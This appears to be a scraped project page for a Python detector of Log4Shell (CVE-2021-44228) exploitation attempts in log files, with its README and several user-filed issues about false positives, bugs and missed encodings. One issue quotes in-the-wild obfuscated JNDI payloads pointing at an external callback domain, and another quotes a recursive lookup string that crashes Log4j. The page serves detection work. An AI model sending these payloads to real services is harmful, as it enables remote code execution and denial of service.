Detector for Log4Shell exploitation attempts

Florian Roth

Last update: Dec 25, 2022

Related tags

Deep Learning log4shell-detector

Overview

log4shell-detector

Detector for Log4Shell exploitation attempts

Idea

The problem with the log4j CVE-2021-44228 exploitation is that the string can be heavily obfuscated in many different ways. It is impossible to cover all possible forms with a reasonable regular expression.

The idea behind this detector is that the respective characters have to appear in a log line in a certain order to match.

${jndi:ldap:

Split up into a list it would look like this:

['$', '{', 'j', 'n', 'd', 'i', ':', 'l', 'd', 'a', 'p', ':']

I call these lists 'detection pads' in my script and process each log line character by character. I check if each character matches the first element of the detection pads. If the character matches a character in one of the detection pads, a pointer moves forward.

When the pointer reaches the end of the list, the detection triggered and the script prints the file name, the complete log line, the detected string and the number of the line in the file.

I've included a decoder for URL based encodings. If we need more, please let me know.

Usage

usage: log4shell-detector.py [-h] [-p path [path ...]] [-d maxdis] [--quick] [--defaultpaths] [--debug]

Log4Shell Exploitation Detectors

optional arguments:
  -h, --help          show this help message and exit
  -p path [path ...]  Path to scan
  -d distance         Maximum distance between each character
  --quick             Skip log lines that don't contain a 2021 or 2022 time stamp
  --defaultpaths      Scan a set of default paths that should contain relevant log files.
  --debug             Debug output

Special Flags

--quick

Only checks log lines that contain a 2021 or 2022 to exclude all scanning of older log entries. We assume that the vulnerability wasn't exploited in 2019 and earlier.

--defaultpaths

Check a list of default log paths used by different software products.

Requirements

Python3

No further or special Python modules are required. It should run on any system that runs Python3.

Screenshots

Help

There are different ways how you can help.

A. Test it against the payloads that you find in-the-wild and let me know if we miss something B. Help me find and fix bugs C. Test if the scripts runs with Python 2; if not, we can add a slightly modified version to the repo

Contact

Twitter: @cyberops

Comments

Refactor detector into a module and add Base64 Decoding
Refactor the detector into a module so that it can be called from other places (ie threat hunting notebooks)

Add a sample for Base64 obfuscation

Handle Base64 obfuscation in a more robust way vs looking only for a full string
opened by JasonKeirstead 9
Need assistance with script

I submitted an issue previously but it was closed without a resolution. Below is the log file. At the end of the script it says it found one exploit attempt, but there were none listed in the actual script per the screenshots of the script on the main page. Simply a deobfuscated string which I'm well aware of that data is in plain text, and isn't an exploit attempt. So unsure why it's stating exploit attempt. Any clarification would be appreciated.

< [.] Starting scan DATE: 2021-12-13 11:37:03.460995 [.] Scanning FOLDER: /var/log ... [.] Processing /var/log/syslog.3.gz ... [.] Processing /var/log/syslog.7.gz ... [.] Processing /var/log/debug.1 ... [.] Processing /var/log/fontconfig.log ... [.] Processing /var/log/syslog.2.gz ... [.] Processing /var/log/user.log.3.gz ... [.] Processing /var/log/syslog.1 ... [.] Processing /var/log/debug.4.gz ... [.] Processing /var/log/dpkg.log.2.gz ... [.] Processing /var/log/alternatives.log.2.gz ... [.] Processing /var/log/auth.log.2.gz ... [.] Processing /var/log/debug.3.gz ... [.] Processing /var/log/daemon.log.3.gz ... [.] Processing /var/log/debug ... [.] Processing /var/log/btmp ... [.] Processing /var/log/daemon.log.4.gz ... [.] Processing /var/log/lastlog ... [.] Processing /var/log/daemon.log.2.gz ... [.] Processing /var/log/auth.log.1 ... [.] Processing /var/log/dpkg.log.4.gz ... [.] Processing /var/log/user.log.1 ... [.] Processing /var/log/vncserver-x11.log ... [.] Processing /var/log/user.log ... [.] Processing /var/log/wtmp ... [.] Processing /var/log/auth.log.4.gz ... [.] Processing /var/log/user.log.2.gz ... [.] Processing /var/log/alternatives.log.3.gz ... [.] Processing /var/log/Xorg.0.log ... [.] Processing /var/log/bootstrap.log ... [.] Processing /var/log/kern.log.1 ... [.] Processing /var/log/Xorg.0.log.old ... [.] Processing /var/log/kern.log.4.gz ... [.] Processing /var/log/dpkg.log ... [.] Processing /var/log/messages.3.gz ... [.] Processing /var/log/auth.log.3.gz ... [.] Processing /var/log/syslog ... [.] Processing /var/log/messages.4.gz ... [.] Processing /var/log/dpkg.log.1 ... [.] Processing /var/log/messages ... [.] Processing /var/log/daemon.log.1 ... [.] Processing /var/log/syslog.4.gz ... [.] Processing /var/log/alternatives.log ... [.] Processing /var/log/kern.log.3.gz ... [.] Processing /var/log/btmp.1 ... [.] Processing /var/log/syslog.5.gz ... [.] Processing /var/log/messages.1 ... [.] Processing /var/log/dpkg.log.3.gz ... [.] Processing /var/log/daemon.log ... [.] Processing /var/log/debug.2.gz ... [.] Processing /var/log/auth.log ... [.] Processing /var/log/messages.2.gz ... [.] Processing /var/log/alternatives.log.4.gz ... [.] Processing /var/log/faillog ... [.] Processing /var/log/user.log.4.gz ... [.] Processing /var/log/syslog.6.gz ... [.] Processing /var/log/boot.log ... [.] Processing /var/log/kern.log.2.gz ... [.] Processing /var/log/kern.log ... [.] Processing /var/log/alternatives.log.1 ... [.] Processing /var/log/vncserver-x11.log.bak ... [.] Processing /var/log/lightdm/x-0.log ... [.] Processing /var/log/lightdm/lightdm.log.old ... [.] Processing /var/log/lightdm/lightdm.log ... [.] Processing /var/log/lightdm/seat0-greeter.log ... [.] Processing /var/log/lightdm/x-0.log.old ... [.] Processing /var/log/lightdm/seat0-greeter.log.old ... [.] Processing /var/log/cups/error_log.2.gz ... [.] Processing /var/log/cups/access_log.1 ... [.] Processing /var/log/cups/error_log.4.gz ... [.] Processing /var/log/cups/access_log.7.gz ... [.] Processing /var/log/cups/error_log.5.gz ... [.] Processing /var/log/cups/access_log ... [.] Processing /var/log/cups/access_log.4.gz ... [.] Processing /var/log/cups/error_log.3.gz ... [.] Processing /var/log/cups/access_log.6.gz ... [.] Processing /var/log/cups/error_log.6.gz ... [.] Processing /var/log/cups/error_log.7.gz ... [.] Processing /var/log/cups/access_log.2.gz ... [.] Processing /var/log/cups/access_log.5.gz ... [.] Processing /var/log/cups/error_log ... [.] Processing /var/log/cups/error_log.1 ... [.] Processing /var/log/cups/access_log.3.gz ... [.] Processing /var/log/samba/log.smbd.1 ... [.] Processing /var/log/samba/log.smbd ... [.] Processing /var/log/samba/log.%m ... [.] Processing /var/log/samba/log.nmbd ... [.] Processing /var/log/samba/log. ... [.] Processing /var/log/samba/log.192.168.15.7 ... [.] Processing /var/log/samba/log.desktop-q4t69gh ... [.] Processing /var/log/samba/log.nmbd.1 ... [.] Processing /var/log/apt/term.log.1.gz ... [.] Processing /var/log/apt/term.log.4.gz ... [.] Processing /var/log/apt/history.log.4.gz ... [.] Processing /var/log/apt/history.log.1.gz ... [.] Processing /var/log/apt/history.log ... [.] Processing /var/log/apt/term.log.2.gz ... [.] Processing /var/log/apt/term.log ... [.] Processing /var/log/apt/history.log.2.gz ... [.] Processing /var/log/apt/history.log.3.gz ... [.] Processing /var/log/apt/term.log.3.gz ... [.] Processing /var/log/apt/eipp.log.xz ... [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log [!] 1 files with exploitation attempts detected in PATH: /var/log [!!!] 1 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-13 12:01:46.740776 [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

opened by Viceman256 7
Exploit attempt?

I have ran this script on my pi. Per your screenshot you can see a line stating an exploit attempt. Mine says at the end that there is an exploit attempt, but doesn't tell me which log. I also get an error on one of the files, could be triggering that alert.

[.] Starting scan DATE: 2021-12-13 11:37:03.460995 [.] Scanning FOLDER: /var/log ... [.] Processing /var/log/syslog.3.gz ... [.] Processing /var/log/syslog.7.gz ... [.] Processing /var/log/debug.1 ... [.] Processing /var/log/fontconfig.log ... [.] Processing /var/log/syslog.2.gz ... [.] Processing /var/log/user.log.3.gz ... [.] Processing /var/log/syslog.1 ... [.] Processing /var/log/debug.4.gz ... [.] Processing /var/log/dpkg.log.2.gz ... [.] Processing /var/log/alternatives.log.2.gz ... [.] Processing /var/log/auth.log.2.gz ... [.] Processing /var/log/debug.3.gz ... [.] Processing /var/log/daemon.log.3.gz ... [.] Processing /var/log/debug ... [.] Processing /var/log/btmp ... [.] Processing /var/log/daemon.log.4.gz ... [.] Processing /var/log/lastlog ... [.] Processing /var/log/daemon.log.2.gz ... [.] Processing /var/log/auth.log.1 ... [.] Processing /var/log/dpkg.log.4.gz ... [.] Processing /var/log/user.log.1 ... [.] Processing /var/log/vncserver-x11.log ... [.] Processing /var/log/user.log ... [.] Processing /var/log/wtmp ... [.] Processing /var/log/auth.log.4.gz ... [.] Processing /var/log/user.log.2.gz ... [.] Processing /var/log/alternatives.log.3.gz ... [.] Processing /var/log/Xorg.0.log ... [.] Processing /var/log/bootstrap.log ... [.] Processing /var/log/kern.log.1 ... [.] Processing /var/log/Xorg.0.log.old ... [.] Processing /var/log/kern.log.4.gz ... [.] Processing /var/log/dpkg.log ... [.] Processing /var/log/messages.3.gz ... [.] Processing /var/log/auth.log.3.gz ... [.] Processing /var/log/syslog ... [.] Processing /var/log/messages.4.gz ... [.] Processing /var/log/dpkg.log.1 ... [.] Processing /var/log/messages ... [.] Processing /var/log/daemon.log.1 ... [.] Processing /var/log/syslog.4.gz ... [.] Processing /var/log/alternatives.log ... [.] Processing /var/log/kern.log.3.gz ... [.] Processing /var/log/btmp.1 ... [.] Processing /var/log/syslog.5.gz ... [.] Processing /var/log/messages.1 ... [.] Processing /var/log/dpkg.log.3.gz ... [.] Processing /var/log/daemon.log ... [.] Processing /var/log/debug.2.gz ... [.] Processing /var/log/auth.log ... [.] Processing /var/log/messages.2.gz ... [.] Processing /var/log/alternatives.log.4.gz ... [.] Processing /var/log/faillog ... [.] Processing /var/log/user.log.4.gz ... [.] Processing /var/log/syslog.6.gz ... [.] Processing /var/log/boot.log ... [.] Processing /var/log/kern.log.2.gz ... [.] Processing /var/log/kern.log ... [.] Processing /var/log/alternatives.log.1 ... [.] Processing /var/log/vncserver-x11.log.bak ... [.] Processing /var/log/lightdm/x-0.log ... [.] Processing /var/log/lightdm/lightdm.log.old ... [.] Processing /var/log/lightdm/lightdm.log ... [.] Processing /var/log/lightdm/seat0-greeter.log ... [.] Processing /var/log/lightdm/x-0.log.old ... [.] Processing /var/log/lightdm/seat0-greeter.log.old ... [.] Processing /var/log/cups/error_log.2.gz ... [.] Processing /var/log/cups/access_log.1 ... [.] Processing /var/log/cups/error_log.4.gz ... [.] Processing /var/log/cups/access_log.7.gz ... [.] Processing /var/log/cups/error_log.5.gz ... [.] Processing /var/log/cups/access_log ... [.] Processing /var/log/cups/access_log.4.gz ... [.] Processing /var/log/cups/error_log.3.gz ... [.] Processing /var/log/cups/access_log.6.gz ... [.] Processing /var/log/cups/error_log.6.gz ... [.] Processing /var/log/cups/error_log.7.gz ... [.] Processing /var/log/cups/access_log.2.gz ... [.] Processing /var/log/cups/access_log.5.gz ... [.] Processing /var/log/cups/error_log ... [.] Processing /var/log/cups/error_log.1 ... [.] Processing /var/log/cups/access_log.3.gz ... [.] Processing /var/log/samba/log.smbd.1 ... [.] Processing /var/log/samba/log.smbd ... [.] Processing /var/log/samba/log.%m ... [.] Processing /var/log/samba/log.nmbd ... [.] Processing /var/log/samba/log. ... [.] Processing /var/log/samba/log.192.168.15.7 ... [.] Processing /var/log/samba/log.desktop-q4t69gh ... [.] Processing /var/log/samba/log.nmbd.1 ... [.] Processing /var/log/apt/term.log.1.gz ... [.] Processing /var/log/apt/term.log.4.gz ... [.] Processing /var/log/apt/history.log.4.gz ... [.] Processing /var/log/apt/history.log.1.gz ... [.] Processing /var/log/apt/history.log ... [.] Processing /var/log/apt/term.log.2.gz ... [.] Processing /var/log/apt/term.log ... [.] Processing /var/log/apt/history.log.2.gz ... [.] Processing /var/log/apt/history.log.3.gz ... [.] Processing /var/log/apt/term.log.3.gz ... [.] Processing /var/log/apt/eipp.log.xz ... [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log [!] 1 files with exploitation attempts detected in PATH: /var/log [!!!] 1 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-13 12:01:46.740776 [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

opened by Viceman256 4
defaultdict for matches, format output, summary option, simpler Python2 compatibility
Changed matches to be in a defaultdict with files and line numbers as keys

Added a summary option that only prints files and line numbers

Simplified Python2 compatibility check, removes need for sys

Verified works on Python 2.7.16

Formatted output to be leveled file --> line number --> match

Simplified argparse requirement for an input
opened by stephanGarland 4
"Exploitation attempt detected", but pattern not in DETECTION_STRINGS. False positive?

log4shell-detector.py detects am exploitation attempt via patttern ${jndi:ldap: in a log file but the pattern is not in the log:

[!!!] Exploitation attempt detected FILE: /var/log/firstboot/vpxd-svcs_firstboot.py_24133_stdout.log LINE_NUMBER: 22 LINE: 2021-03-12T00:12:10.861Z ['# invsvc cisreg props\n', 'solutionUser.name = ${solution-user.name}\n', 'solutionUser.ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'cmreg.serviceid = ${invsvc.service-id}\n', '# invsvc registration spec properties\n', 'serviceVersion = 1.0\n', 'ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'serviceType.product = com.vmware.cis\n', 'serviceType.type = cs.inventory\n', 'serviceNameResourceKey = cs.inventory.ServiceName\n', 'serviceDescriptionResourceKey = cs.inventory.ServiceDescription\n', 'serviceGroupResourceKey = cs.inventory.servicegroupresource\n', 'serviceGroupInternalId = cs\n', 'controlScriptPath = ${controlscript.path}\n', 'hostId = ${sca.hostid}\n', 'endpoint0.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc\n', 'endpoint0.type.protocol = http\n', 'endpoint0.type.id = com.vmware.cis.inventory\n', 'endpoint1.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint1.type.protocol = vmomi\n', 'endpoint1.type.id = com.vmware.cis.inventory.server\n', 'endpoint2.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint2.type.protocol = vmomi\n', 'endpoint2.type.id = com.vmware.cis.tagging.server\n', 'endpoint3.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vapi\n', 'endpoint3.type.protocol = vapi.json.https\n', 'endpoint3.type.id = com.vmware.cis.inventory.vapi\n', 'endpoint3.data0.key = com.vmware.vapi.metadata.metamodel.file.authz\n', 'endpoint3.data0.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_metamodel.json\n', 'endpoint3.data1.key = com.vmware.vapi.metadata.authentication.file.authz\n', 'endpoint3.data1.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_authentication.json\n', 'endpoint3.data2.key = com.vmware.vapi.metadata.routing.file.authz\n', 'endpoint3.data2.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_routing.json\n', 'endpoint3.data3.key = com.vmware.vapi.metadata.metamodel.file.tagging\n', 'endpoint3.data3.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_metamodel.json\n', 'endpoint3.data4.key = com.vmware.vapi.metadata.authentication.file.tagging\n', 'endpoint3.data4.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_authentication.json\n', 'endpoint3.data5.key = com.vmware.vapi.metadata.cli.file.tagging\n', 'endpoint3.data5.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_cli.json\n', 'endpoint4.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}\n', 'endpoint4.type.protocol = gRPC\n', 'endpoint4.type.id = tagging\n', 'endpoint4.data0.key = cis.common.ep.localurl\n', 'endpoint4.data0.value = http://localhost:##{TAGGING_GRPC_PORT}##\n', 'attribute0.key = Syncable\n', 'attribute0.value = ELM,SPOG\n', 'attribute1.key = Subscribable\n', 'attribute1.value = true\n', 'health.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-health\n', 'resourcebundle.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-resource\n', 'resourcebundle.data0.key = com.vmware.cis.common.resourcebundle.basename\n', 'resourcebundle.data0.value = cs.inventory.ResourceBundle\n', '# reverse proxy configuration\n', 'rhttpproxy.file = invsvc-proxy.conf\n', 'rhttpproxy.endpoint0.namespace = /invsvc\n', 'rhttpproxy.endpoint0.connectionType = local\n', 'rhttpproxy.endpoint0.address = ${vpxd-svcs.int.http}\n', 'rhttpproxy.endpoint0.httpAccessMode = redirect\n', 'rhttpproxy.endpoint0.httpsAccessMode = allow\n'] DEOBFUSCATED_STRING: ${jndi:ldap:

opened by busch 3
gzipped log-file path validation

The gzipped file path validation assumes that there is "log." string in path-name. This causes problems if log-file naming format is something like "SystemOut.log-20211212.gz". Could the dot (.) be removed from validation condition?

opened by aylatalo 2
invalid character in cmd [Version 10.0.14393] on Windows Server 2016

C:\Users\Administrator\Downloads>python log4shell-detector.py -p C:\windows File "C:\Users\Administrator\Downloads\log4shell-detector.py", line 106 log4shell-detector/log4shell-detector.py at main · Neo23x0/log4shell-detector · GitHub ^ SyntaxError: invalid character '·' (U+00B7)

opened by atleast1eyeblnd 2
New payloads

These payloads do not appear with a google or github search so I think they are new. Cloudflare WAF has pretty good detection rules for this, but their WAF did not block these.

Please close this issue or do what you like with this information, I just wanted to share these somewhere where they may have some impact. I did not test them with this repo.

IP: 89.248.173.140

path query: /%3Fx=$%7Bjndi:ldap:/guidedhacking.com.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com/a%7D

user agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{Hostname}}.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com}

it appears their expansion of {{Hostname}} did not work as intended in the useragent

opened by GH-Rake 1
MemoryError - [E] Can't process FILE: xxxx REASON: None

scan_file result = self.check_line(line) File "xxxx/log4shell-detector-main/Log4ShellDetector/Log4ShellDetector.py", line 82, in check_line linechars = list(decoded_line) MemoryError [E] Can't process FILE: xxxx REASON: None

This can be an issue, especially with --auto detection, unusual txt files and and memory limited environments.

There is unnecessary list conversion in Log4ShellDetector. In this case no need to convert string to list in order to iterate the characters in the string. If list conversion is skipped, memory usage should decrease.

"for c in linechars:" is same as "for c in decoded_line:"

opened by boog1ebug 1
http statuscode to exploit attempts

Hello,

thanks for this tool. How would you detect if an exploit has been successful via the http codes? Would 404 code mean the request has been blocked and any 2xx code that it was successful?

Thanks in advance.

opened by 4jwWa2EnYK5FIIaK7AVp 1
Add references/steps to follow for removing the exploit.

I ran the script on my server and got the below results. However, neither Java nor log4j is installed on my server. Please guide me on what to do next. sudo python3 log4shell-detector.py -p /var/log/ --summary

[.] Starting scan DATE: 2021-12-14 05:34:03.155342 [.] Scanning FOLDER: /var/log/ ...

[!] 10 files with exploitation attempts detected in PATH: /var/log/ [!] FILE: /var/log/gitlab/gitlab-workhorse/current LINE_NUMBER: 255 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 1489 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2204 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2205 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2444 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2445 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 2 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 3 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 136 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 157 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 158 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 159 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 372 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 373 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 374 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 375 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 376 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 581 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 582 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 583 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 584 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1227 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 25 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 52 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 63 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 64 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 165 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1332 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1537 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1580 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2043 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2045 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 504 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 505 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 5507 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6339 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6340 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6932 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1878 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1880 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 5 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 6 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 474 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1422 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1423 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2527 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2528 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30592 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30594 STRING: ${jndi:ldap: [!!!] 50 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-14 05:50:44.095624 [.] Scan took the following time to complete DURATION: 0 hours 16 minutes 40 seconds

opened by harishch4 1
Modified script for including more payloads

Thanks for the wonderful code for detecting the payloads! I tested this script against variety of known payloads available and found it is failing to detect some payloads containing invalid unicode character, you can find the example here https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words So I created another function to decode these invalid unicodes to ASCII using a package called "anyascii"(so one need to install this package using pip, hoping it is not an inconvenience), decoded these strings and added a conditional statements for dealing with non-ASCII charecters.

Also I added the encoded example of these invalid unicodes in the testing script with a heading invalid unicodes in the plain positive text category. I tested my script and I found some false positive cases so as you can notice I modified these detection strings with an extra "/" , so that it can bypass the false positive cases.

Please review my code and kindly let me know any questions and suggestions you have! Thank you!

opened by vidhyasasi 0
New payload results in DOS attack

Thank you for the brilliant code for scanning the payload! I have an issues as follows : Payload Description: If a string substitution is attempted for any reason on the following string, it will trigger an infinite recursion, and the application will crash: ${${::-${::-$${::-j}}}}. Reference : https://issues.apache.org/jira/browse/LOG4J2-3230

I tried the script to test whether it could bypass the mentioned payload and unfortunately it could not.So is it possible to modify the script to include this payload as well? Thanks !

opened by vidhyasasi 0
Not working in version 0.11.1 / No module named 'Log4ShellDetector'

MyUser@MyHost:scripts>python3 Log4ShellDetector --auto Traceback (most recent call last):

File "/home/MyUser/scripts/Log4ShellDetector", line 16, in import Log4ShellDetector.Log4ShellDetector as Log4ShellDetector ModuleNotFoundError: No module named 'Log4ShellDetector'

opened by MaFreiberger 1
find command reports [wj]ar as listing log4j, but manual inspection diverges
Hi there,

many thanks again for all the hard work!

The following command returns several matches for a Java program on a machine we have:

find . -name '*[wj]ar' -print -exec sh -c 'jar tvf {} | grep log4j' \;

But, a manual inspection of those matched files shows empty grep results. For example, the following file matches:

./lib/xml.jar

If I run jar tvf on that, then I get the output in the attached file:

https://www.dropbox.com/s/snzdgxzlx9fhucy/lib_xml_jar_tvf.txt?dl=0

Running this through grep log4j returns an empty result:

me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$ jar tvf ./lib/xml.jar | grep log4j me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$

I am not a pro with the find command, so not sure how to adjust it.

Best wishes and many thanks, Rob
opened by rennis250 0

False alarms?

First off, many thanks for this great tool in this terrible situation!

Sorry if this is the wrong place to raise this, but it seems we might be getting false alarms on our system. I have run the detector a few times on /var/log and every time, it reports three lines as attempts in a cdebconf file, but the deobfuscated string is different each time.

Here are three examples:

[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
[!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}

